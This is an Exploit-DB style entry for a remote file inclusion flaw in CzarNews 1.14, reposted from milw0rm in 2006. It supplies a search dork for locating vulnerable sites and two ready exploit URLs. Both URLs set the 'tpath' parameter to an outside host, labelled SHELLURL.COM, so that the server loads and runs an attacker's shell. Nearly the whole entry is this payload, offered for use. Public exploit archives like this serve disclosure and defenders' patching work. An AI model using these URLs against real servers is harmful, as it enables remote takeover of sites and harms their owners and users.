CzarNews 1.14 - 'tpath' Remote File Inclusion

Author: SHiKaA
type: webapps
platform: php
port: 
date_added: 2006-07-12 
date_updated: 2016-12-22 
verified: 1 
codes: OSVDB-27312;CVE-2006-3685;OSVDB-14926;CVE-2005-0859;OSVDB-14925 
tags: 
aliases:  
screenshot_url:  
application_url: 

=================================================================
CzarNews <= (tpath) Remote File Inclusion Exploit
================================================================
                                                                |
Critical Level : Dangerous                                       |
                                                                |
=================================================================
Dork :  "CzarNews v1.12 " | "CzarNews v1.13" | "CzarNews v1.14 "

http://sitename.com/news.php?tpath=http://SHELLURL.COM?
http://sitename.com/cn_config.php?tpath=http://SHELLURL.COM?

===============================================================================
Discoverd By : SHiKaA

Conatact : SHiKaA-[at]hotmail.com

GreetZ : Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================


# milw0rm.com [2006-07-13]